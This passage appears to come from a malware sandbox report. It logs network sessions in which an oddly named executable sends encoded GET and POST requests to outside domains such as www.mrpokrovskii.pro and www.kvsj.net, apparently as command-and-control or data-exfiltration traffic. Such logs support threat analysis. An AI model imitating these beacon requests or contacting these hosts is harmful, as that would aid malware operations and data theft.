                                                                                  Data Ascii: PHM8hj-=hPHW3D6UD6FbWucULQxgX+GvRiQkD65QCASpdF7yT5SgvKaahmHr2PR5V2OFSeBq4tfdQruOHpwI8Xhx1cObKPzJbjlrtVEGpEZdbRQD+FHcrY7wUVtJt0uJao/GF54Jfm9PvvOz4smlPxafVe+BB0rtSJQVm1e71QxcvciTWlqp2hGf3vvT9wk+VipKTMhxDZZzoEuX1bR+g5h2wMrQIqPkse2PqOucn42lnoJYPsQiQyCL9lSVV1PaVDYna7G8dylZsOWZKOl8XkSf7n9Ru4A0JiilRaiH40l2Hqt08/nEMYQof2hAzkf0Sv23V0pcDHVSluh2fZSbriXWM5qUx8MpQHTF5DzPmizTplceZv64s/L43b3jF9KxxvejgzPesoClfPJsBHxB9xIYZpDo9w2bvGxu5W31fWmRivGnPgeZBXacU6+hGGyhDM0B9UYggeBcTghKF5t40XoPbhdUoNjpVYt1jteFqkAw+WAVpy6Yz391tYP0nPluebANY3c887QrhKdrA4VxwEBkZy7e6JLSEleEETuB6kqHsJPlAfHPScyOR5sSrO/BOycziaOA7JeN0NBWAunVhVjr4MPE/lKXRhwSSDRKY+4Jb+729zwOD2imOagXnuK5KoH9Jjh/nHg0iMizdHhW7PDVhEVQuToA3Y7TLkka64UWdhgm34cgyGXUiXSGCVohXS97HZE6EsQ8DVCBIpCISUh5mG1nqekO2nQxpkfiBD2XeWzP7D0nQkSXtQ/eJmL/qPH4SyBQubCaPe7MaOtiR/u1Pugt8bbr6XyIPG4Bu0L4/7b/bCj5gMFYDauH9T9ka8Un6V4WMY9rnPWr6MS9qrks3ikZUa22uAoFtIZLszcXVbIR1JyQGebQFWE9gsUb9MMkBnjaBbcJQfK1BU/TkSjcwVXERs8n6TQHXHQIny93dLHwn4JB0nMd33NheJ0pHr/r3jerROqGGQRUgaGXQMegtP9iTViiiMkT/wljR/64BgJf5Pao [TRUNCATED]
                                                                                  Dec 9, 2024 06:57:21.145694971 CET1236INHTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:20 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 613922b1-bb70-476a-97a1-96f12513948a
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rbcTwr%2Bf1AZhFW5NsS2L1pnDxH2yWQiXcSy5p75dxYn8Yyz068soy1BEbfS7kXYfADnfR7vzCVVywgFtYwEedVQSHxEzo9s8xlw95pDW2TiyfOJpWln0oDYUQjd0cf%2BeT4I%2Fk2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1d4fe2a42e7-EWR
                                                                                  Content-Encoding: gzip
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1775&min_rtt=1775&rtt_var=887&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1865&delivery_rate=0&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 24 8e 41 0a c2 30 14 05 af 12 de ba 41 53 63 6b 73 00 c1 8d 0a ba 13 17 3f 4d aa c5 98 0f 69 0a 8a f4 ee 52 ba 9e 61 98 1f 2c bb 2f 4c 1c 43 28 e0 53 e2 34 c0 fc d0 b2 f3 30 7a ad 0b 44 7a 7b 18 1c 39 8b 3d 8f d1 a1 80
                                                                                  Data Ascii: b6$A0AScks?MiRa,/LC(S40zDz{9=
                                                                                  Dec 9, 2024 06:57:21.145733118 CET106INData Raw: f3 99 fa 30 c0 dc 70 64 f1 a4 e8 82 4f a2 9b a9 e8 38 89 f3 e9 72 15 2b f5 fd b4 2b dc a7 d9 b7 e3 e3 10 3b 5e d2 29 f9 40 b9 e7 78 70 30 a8 d4 a6 29 4b ab a4 b5 f5 5a ea ba 22 d9 d4 a4 64 53 75 aa dc aa 4d a3 77 84 02 43 a6 f6 75 4d d4 fa e5 76
                                                                                  Data Ascii: 0pdO8r++;^)@xp0)KZ"dSuMwCuMve0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.749829104.21.62.184805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:22.529239893 CET561OUTGET /1yxc/?PHM8hj-=sNv20zOiDYMkOMIaI1pmdsmeUTcgC7U2G3KMZ1n3ZrvJqNyjokS5yfEka1CqXs0XgMjSEo6oJscLiFZx2eOkVujOahZ4zlc0tGcqNQ4Ewnbxtpizbi9lhn/PRfD4HtEYcHVJw6C2z+yJ&tHfx=9byl HTTP/1.1
                                                                                  Host: www.questmatch.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:57:23.798679113 CET1236INHTTP/1.1 404
                                                                                  Date: Mon, 09 Dec 2024 05:57:23 GMT
                                                                                  Content-Type: application/json
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Vary: Origin
                                                                                  Vary: Access-Control-Request-Method
                                                                                  Vary: Access-Control-Request-Headers
                                                                                  X-Correlation-ID: 1cd8a78e-dc82-4580-a7a1-5d1f60780398
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: 0
                                                                                  CF-Connecting-IP: 8.46.123.228
                                                                                  CF-IPCountry: US
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z5IodcmwxVl5JInRJIuIaYm6BKwkQ%2BMteMMg3Xo8XMFAsE%2F7GYSiL0wP3hmdWwY5wEP2yJXX8uetIvit9fYo0EN6%2FbeRkvpURQ2YQ64wPSqMSCTEyxG%2Brjdnnto8vW9pnAHA6R8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef2c1e59d5c43ee-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1653&rtt_var=826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=561&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                  Data Raw: 62 62 0d 0a 7b 22 62 6f 64 79 22 3a 6e 75 6c 6c 2c 22 65 72 72 6f 72 73 22 3a 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6e 61 6d 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 2c 22 64 65 74 61 69 6c 73 22 3a 5b 22 4e 6f 20 68 61 6e 64 6c 65 72 20 66 6f 75 6e 64 20 66 6f 72 20 47 45 54 20 2f 31 79 78 63 2f 22 5d 7d 2c 22 64 65 62 75 67
                                                                                  Data Ascii: bb{"body":null,"errors":{"code":404,"name":"Not Found","details":["No handler found for GET /1yxc/"]},"debug
                                                                                  Dec 9, 2024 06:57:23.798736095 CET88INData Raw: 49 6e 66 6f 22 3a 7b 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 31 63 64 38 61 37 38 65 2d 64 63 38 32 2d 34 35 38 30 2d 61 37 61 31 2d 35 64 31 66 36 30 37 38 30 33 39 38 22 2c 22 73 74 61 63 6b 54 72 61 63 65 22 3a 6e 75 6c 6c 7d 7d 0d
                                                                                  Data Ascii: Info":{"correlationId":"1cd8a78e-dc82-4580-a7a1-5d1f60780398","stackTrace":null}}0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.74984585.25.177.138805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:29.762391090 CET838OUTPOST /7mvy/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 34 7a 30 6a 6f 73 67 30 67 51 51 39 55 2b 51 66 5a 4c 65 5a 4d 57 42 4b 72 30 42 62 4d 67 30 48 35 57 4a 4d 75 65 72 5a 45 7a 2f 30 77 69 46 56 33 2f 57 55 65 47 41 6d 54 66 71 77 6a 32 54 76 2b 62 42 78 57 43 54 31 5a 35 38 57 59 6f 47 79 58 48 55 4c 44 33 67 6f 54 41 52 67 79 44 4e 58 75 37 62 63 72 65 7a 52 67 67 59 4e 45 57 43 67 2f 68 77 6c 71 38 56 41 34 62 79 61 47 4d 37 78 7a 58 30 5a 46 43 6a 6a 48 49 6a 50 30 51 4d 2f 35 4e 66 46 77 4d 42 77 57 52 4b 45 74 6c 5a 74 56 75 48 54 77 69 4a 52 2b 44 2f 58 57 44 38 73 6a 6d 6e 36 61 57 31 4d 6e 6f 35 57 2b 44 77 75 4f 7a 57 41 76 56 59 65 47 52 30 5a 45 43 33 79 51 3d 3d
                                                                                  Data Ascii: PHM8hj-=s4z0josg0gQQ9U+QfZLeZMWBKr0BbMg0H5WJMuerZEz/0wiFV3/WUeGAmTfqwj2Tv+bBxWCT1Z58WYoGyXHULD3goTARgyDNXu7bcrezRggYNEWCg/hwlq8VA4byaGM7xzX0ZFCjjHIjP0QM/5NfFwMBwWRKEtlZtVuHTwiJR+D/XWD8sjmn6aW1Mno5W+DwuOzWAvVYeGR0ZEC3yQ==
                                                                                  Dec 9, 2024 06:57:31.028702021 CET462INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 09 Dec 2024 05:57:30 GMT
                                                                                  Server: Apache/2
                                                                                  Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 242
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.74985185.25.177.138805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:32.428884983 CET858OUTPOST /7mvy/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 240
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 34 7a 30 6a 6f 73 67 30 67 51 51 6e 31 4f 51 65 2b 66 65 65 73 57 47 58 62 30 42 4d 63 67 6f 48 35 4b 4a 4d 76 4b 43 65 32 58 2f 7a 56 6d 46 55 31 58 57 54 65 47 41 73 7a 66 56 39 44 32 59 76 2b 65 69 78 58 2b 54 31 5a 46 38 57 64 4d 47 75 30 66 58 4e 44 33 6d 6c 7a 41 58 39 43 44 4e 58 75 37 62 63 71 2f 6b 52 67 6f 59 4e 30 6d 43 67 65 68 7a 73 4b 38 57 52 34 62 79 65 47 4d 2f 78 7a 57 6a 5a 45 50 30 6a 43 55 6a 50 77 41 4d 2f 73 78 59 4f 77 4d 4c 2b 32 51 4c 55 63 64 64 6e 33 36 66 56 78 57 36 4f 4d 50 6b 53 67 43 65 32 42 71 4c 6b 4c 75 4f 49 6c 4d 50 42 59 65 46 73 50 33 4f 4e 4e 68 35 42 78 30 65 55 57 6a 7a 6b 6f 30 62 62 33 45 7a 30 45 35 69 70 76 53 6c 6e 4e 78 45 70 38 6b 3d
                                                                                  Data Ascii: PHM8hj-=s4z0josg0gQQn1OQe+feesWGXb0BMcgoH5KJMvKCe2X/zVmFU1XWTeGAszfV9D2Yv+eixX+T1ZF8WdMGu0fXND3mlzAX9CDNXu7bcq/kRgoYN0mCgehzsK8WR4byeGM/xzWjZEP0jCUjPwAM/sxYOwML+2QLUcddn36fVxW6OMPkSgCe2BqLkLuOIlMPBYeFsP3ONNh5Bx0eUWjzko0bb3Ez0E5ipvSlnNxEp8k=
                                                                                  Dec 9, 2024 06:57:33.693114042 CET462INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 09 Dec 2024 05:57:33 GMT
                                                                                  Server: Apache/2
                                                                                  Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 242
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.74986185.25.177.138805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:35.097094059 CET1871OUTPOST /7mvy/ HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mrpokrovskii.pro
                                                                                  Referer: http://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 1252
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Data Raw: 50 48 4d 38 68 6a 2d 3d 73 34 7a 30 6a 6f 73 67 30 67 51 51 6e 31 4f 51 65 2b 66 65 65 73 57 47 58 62 30 42 4d 63 67 6f 48 35 4b 4a 4d 76 4b 43 65 32 66 2f 7a 6e 75 46 53 55 58 57 53 65 47 41 71 44 66 51 39 44 32 5a 76 36 7a 72 78 58 79 74 31 66 4a 38 57 37 41 47 69 56 66 58 65 6a 33 6d 73 54 41 57 67 79 43 58 58 75 72 66 63 71 50 6b 52 67 6f 59 4e 32 2b 43 33 66 68 7a 71 4b 38 56 41 34 62 6d 61 47 4d 58 78 7a 4f 7a 5a 45 62 6b 6a 32 59 6a 4f 52 73 4d 7a 2b 5a 59 44 77 4d 4e 7a 57 52 59 55 64 67 44 6e 33 6d 35 56 78 53 44 4f 4d 33 6b 54 78 65 46 6c 79 69 48 31 36 71 49 4b 31 56 71 4f 35 4f 6a 73 63 50 34 4d 2f 39 6b 41 42 77 44 4e 31 62 6e 6e 66 6c 6b 43 6e 46 41 73 31 38 30 75 36 2b 67 38 73 6c 4d 39 71 4e 4b 6b 6f 6e 5a 74 54 55 31 58 47 78 49 76 45 76 58 42 47 57 62 36 47 34 34 36 33 43 2b 2b 6a 6f 39 64 64 6b 39 6d 31 57 74 51 45 2b 4c 44 46 38 55 6a 4a 30 64 52 7a 75 44 38 33 77 4d 6d 7a 65 4d 50 69 34 4e 34 37 57 79 6e 69 6d 36 66 37 7a 58 37 79 35 55 4a 32 73 6c 74 4d 58 6d 34 39 67 57 36 52 [TRUNCATED]
                                                                                  Data Ascii: PHM8hj-=s4z0josg0gQQn1OQe+feesWGXb0BMcgoH5KJMvKCe2f/znuFSUXWSeGAqDfQ9D2Zv6zrxXyt1fJ8W7AGiVfXej3msTAWgyCXXurfcqPkRgoYN2+C3fhzqK8VA4bmaGMXxzOzZEbkj2YjORsMz+ZYDwMNzWRYUdgDn3m5VxSDOM3kTxeFlyiH16qIK1VqO5OjscP4M/9kABwDN1bnnflkCnFAs180u6+g8slM9qNKkonZtTU1XGxIvEvXBGWb6G4463C++jo9ddk9m1WtQE+LDF8UjJ0dRzuD83wMmzeMPi4N47Wynim6f7zX7y5UJ2sltMXm49gW6R//8DEk+jUUvp1N6RzXuMGszkIDR9DVKIsZPQIMTlyW/rfBtaJN501EV77etj6vc+JH+YiIWQb35D3/wZI3ml1EvlHTUyUgv519Mz4xZsZ99eiu19pgX1mN5wnldWzVhZEtEzZo8pYxoel3A03M8untDYv51LOmuVRnyboEYcMzXTPJ7Oj4kMLmTj54H1JvonHnsicFQsQ1RAHLxIBCjI8OudilnMDNZMHuS/WhwEq6/+ZO8n+R4jSZ+WOCQ5nlLD5FFq4JCDLrQ8fFo0Fn7SXj3D8ecIqB8d3hjymr8F/VtZ1AH6ugoT2076f83gvPaLTARJcXSKJdNRHOhn3oBPOtoMVgZUFURigjFyjAerGdu5szDMvqot7WXKw8wqWId63oRwHOj8J6vlxf/AEWzJOkH8I3XkBN3tnH9KSdGci4VR3r1LGxQcauNrytZGttmWMby1rokEfjrymXm5UnuWoOgFTWdoQYs+Q69G1WjYNZiDdvtLz0W/rL7WbNOUhr3oAuMflhjqbNTEzD/do+zNB0hRFnBHsJ5BMg//ShLLyR1UfzTd+gyue1WZSQGOCKN1AlW1PBmONrD7S4nCARbWlNVEZVX0ZOe3GNDH+zdU/wgWfgoXAw1EXRGGDkklQ8Rkb/VEHjCKytXHnABnoKvzJmFtjgVSfXu1K7 [TRUNCATED]
                                                                                  Dec 9, 2024 06:57:36.367711067 CET462INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 09 Dec 2024 05:57:36 GMT
                                                                                  Server: Apache/2
                                                                                  Location: https://www.mrpokrovskii.pro/7mvy/
                                                                                  Content-Length: 242
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.74986885.25.177.138805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:57:37.748908997 CET563OUTGET /7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA HTTP/1.1
                                                                                  Host: www.mrpokrovskii.pro
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
                                                                                  Dec 9, 2024 06:57:39.032749891 CET784INHTTP/1.1 301 Moved Permanently
                                                                                  Date: Mon, 09 Dec 2024 05:57:38 GMT
                                                                                  Server: Apache/2
                                                                                  Location: https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA
                                                                                  Content-Length: 405
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 72 70 6f 6b 72 6f 76 73 6b 69 69 2e 70 72 6f 2f 37 6d 76 79 2f 3f 74 48 66 78 3d 39 62 79 6c 26 61 6d 70 3b 50 48 4d 38 68 6a 2d 3d 68 36 62 55 67 59 4d 35 6f 51 49 6f 6d 33 53 48 58 72 6e 55 56 39 2b 36 44 59 73 69 5a 75 63 33 42 4b 69 43 48 2b 53 61 5a 45 71 50 7a 51 6d 37 64 45 47 63 51 75 62 41 67 47 37 2f 37 52 66 2b 6a 37 7a 77 30 6e 53 6c 2b 63 74 44 56 49 63 6b 69 30 7a 6a 4c 52 2f 41 31 54 49 45 67 41 6a 43 58 73 62 39 45 38 76 7a [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.mrpokrovskii.pro/7mvy/?tHfx=9byl&amp;PHM8hj-=h6bUgYM5oQIom3SHXrnUV9+6DYsiZuc3BKiCH+SaZEqPzQm7dEGcQubAgG7/7Rf+j7zw0nSl+ctDVIcki0zjLR/A1TIEgAjCXsb9E8vzRRsKI3KJo+lQnIV0aLjvGHYK1ASSJWLRp1oA">here</a>.</p></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.749923173.236.199.97805412C:\Program Files (x86)\XeHGkrauSFGmSPdiQdqyIHAjWEibERmBWJAktGJdzHWtPIYeZdQfaubsM\aegBDZrMeWOlT.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Dec 9, 2024 06:58:01.984894991 CET814OUTPOST /zu0o/ HTTP/1.1
                                                                                  Host: www.kvsj.net
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.kvsj.net
                                                                                  Referer: http://www.kvsj.net/zu0o/
                                                                                  Content-Length: 220
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Cache-Control: max-age=0
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.1; Nexus 6 Build/LMY47E; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/44.0.2403.117 Mobile Safari/537.36
